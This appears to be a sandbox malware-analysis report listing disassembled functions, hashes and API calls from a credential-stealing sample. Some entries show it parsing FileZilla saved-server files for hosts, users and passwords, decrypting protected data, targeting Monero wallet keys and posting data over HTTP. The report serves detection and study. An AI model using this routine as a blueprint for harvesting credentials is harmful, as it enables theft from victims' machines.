                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PwvS$er~$iKy$5Kv
                                • API String ID: 0-3787672126
                                • Opcode ID: ad5b6a79a498b63486b241d49aeac34f9f6da16ba335c99480fd7553a0ec905b
                                • Instruction ID: 7f2fe957767b280c8a68eacfed052b212c8d68fb7197b5d53235b96a001d098b
                                • Opcode Fuzzy Hash: ad5b6a79a498b63486b241d49aeac34f9f6da16ba335c99480fd7553a0ec905b
                                • Instruction Fuzzy Hash: BF5228F3A082049FE304AE2DEC8577AB7E5EFD4720F1A863DEAC487344E63558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'S~<$'S~<$6:}$d?>
                                • API String ID: 0-1236524275
                                • Opcode ID: 2a1e8f6ab8f66e4d04f783b19b5a4bd16403439ef3203d78f927036d5aeadf00
                                • Instruction ID: 64b5dcb9173fdf9e37eacb59a801cfacdced8c3b4d0fe3825e6e6b13ff5be66b
                                • Opcode Fuzzy Hash: 2a1e8f6ab8f66e4d04f783b19b5a4bd16403439ef3203d78f927036d5aeadf00
                                • Instruction Fuzzy Hash: EC12F1F391C2149BE3046E29EC8577AF7E9EF94720F1A493DEAC497740EA35980186C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (]$:$7vo$YBw?
                                • API String ID: 0-1142385565
                                APIs
                                • CoCreateInstance.COMBASE(0009E118,00000000,00000001,0009E108,00000000), ref: 00093758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 000937B0
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00089B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00089BA3
                                • LocalFree.KERNEL32(?), ref: 00089BD3
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: z\|$S6{
                                • API String ID: 0-1815286500
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !Vj|$?Hhw
                                • API String ID: 0-841555557
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &i;
                                • API String ID: 0-1416332070
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: e5N_
                                • API String ID: 0-2587021752
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: eJCd
                                • API String ID: 0-3241830844
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8}
                                • API String ID: 0-4209514861
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A~=n
                                • API String ID: 0-2623644159
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ]cJ
                                • API String ID: 0-1480337199
                                • Opcode ID: 4e6eba61236bbb2a9d3202cff86abdc2e323094836426fde3bdffd09131bc711
                                • Instruction ID: 70d05658720157628049f017c9b4f44d9f9b0591c58700e1c8629cc3115c2f1b
                                • Opcode Fuzzy Hash: 4e6eba61236bbb2a9d3202cff86abdc2e323094836426fde3bdffd09131bc711
                                • Instruction Fuzzy Hash: CC31C1B3A086014BF3546A2DDC9633AB7D6EB98310F2A453DDA85C3784E93D98158686
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a089b7998997d075b0bf3483417c3d7e9a55e9ae3e842e6b73c8f5728bc912c3
                                • Instruction ID: 9c366995498afc5ca5abd1692e3ce8df90570f44c615bbe5de4cdc083df15a0e
                                • Opcode Fuzzy Hash: a089b7998997d075b0bf3483417c3d7e9a55e9ae3e842e6b73c8f5728bc912c3
                                • Instruction Fuzzy Hash: 505107F3E086105FE3046E29DC8576ABBE5EFE4720F1B463DDAC893780E63958458792
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c7b18766e35e678902ff0467660c40ac1ad2f3b3d2641695c43e2f5b0b03ee8c
                                • Instruction ID: 3731d6e8428536077734fe5ac5277e39a1563f8fbc79db679e0fb172b4b6a840
                                • Opcode Fuzzy Hash: c7b18766e35e678902ff0467660c40ac1ad2f3b3d2641695c43e2f5b0b03ee8c
                                • Instruction Fuzzy Hash: 114149F3E086205BF7046D29DC457BA7B95DF94360F2A823DEA8447B84E935580582D6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 07aef4ad542c2594994fa388a4975a5047db200da3f166b8ec2cce1b2ebdddb4
                                • Instruction ID: 1cbdc57a0a6a9a178961c5e0ce3fd564f8b0e1a6f4ee1df5c5364a74164b2907
                                • Opcode Fuzzy Hash: 07aef4ad542c2594994fa388a4975a5047db200da3f166b8ec2cce1b2ebdddb4
                                • Instruction Fuzzy Hash: BF4126F3E181005FE704AE3DEC5477AB6D6DBD4320F1A853DEA8497788E9355D0982C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 933f209b241c93457886066c43a1e3ba2a1eb8582a5be3c066c3d6bf28ae7e49
                                • Instruction ID: 5564cc6dd9e149f75ba6d198c65587aa63fd2baa74f144e5ee3b7411052bccd9
                                • Opcode Fuzzy Hash: 933f209b241c93457886066c43a1e3ba2a1eb8582a5be3c066c3d6bf28ae7e49
                                • Instruction Fuzzy Hash: CE4136B211C700DFE355AF69E88277AFBE5FF58310F16482DE6D182610E67994408B9B
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                  • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                  • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                  • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                  • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                  • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                  • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,000A0DBA,000A0DB7,000A0DB6,000A0DB3), ref: 00090362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00090369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00090385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 000903CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 000903DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00090419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00090463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00090562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00090571
                                • lstrcat.KERNEL32(?,url: ), ref: 00090580
                                • lstrcat.KERNEL32(?,00000000), ref: 00090593
                                • lstrcat.KERNEL32(?,000A1678), ref: 000905A2
                                • lstrcat.KERNEL32(?,00000000), ref: 000905B5
                                • lstrcat.KERNEL32(?,000A167C), ref: 000905C4
                                • lstrcat.KERNEL32(?,login: ), ref: 000905D3
                                • lstrcat.KERNEL32(?,00000000), ref: 000905E6
                                • lstrcat.KERNEL32(?,000A1688), ref: 000905F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00090604
                                • lstrcat.KERNEL32(?,00000000), ref: 00090617
                                • lstrcat.KERNEL32(?,000A1698), ref: 00090626
                                • lstrcat.KERNEL32(?,000A169C), ref: 00090635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: eb96d52a28a8eefa345e64bc6953f8846394a8920546d4d0030cb9399acacb74
                                • Instruction ID: 62e6502b88ec35b5110ab1ab66b584c9a03d002814211888ec52b45d5df5fce4
                                • Opcode Fuzzy Hash: eb96d52a28a8eefa345e64bc6953f8846394a8920546d4d0030cb9399acacb74
                                • Instruction Fuzzy Hash: 70D12271A10108ABCF04FBF4DD9AEEEB378BF55300F544518F102A6092DF74AA09DBA2
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                  • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000859F8
                                • StrCmpCA.SHLWAPI(?,00D0F398), ref: 00085A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00085B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00D0F2C8,00000000,?,00D0E5C0,00000000,?,000A1A1C), ref: 00085E71
                                • lstrlen.KERNEL32(00000000), ref: 00085E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00085E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00085E9A
                                • lstrlen.KERNEL32(00000000), ref: 00085EAF
                                • lstrlen.KERNEL32(00000000), ref: 00085ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00085EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00085F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00085F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00085F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00085FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00085FBD
                                • HttpOpenRequestA.WININET(00000000,00D0F3A8,?,00D0EDF8,00000000,00000000,00400100,00000000), ref: 00085BF8
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • InternetCloseHandle.WININET(00000000), ref: 00085FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
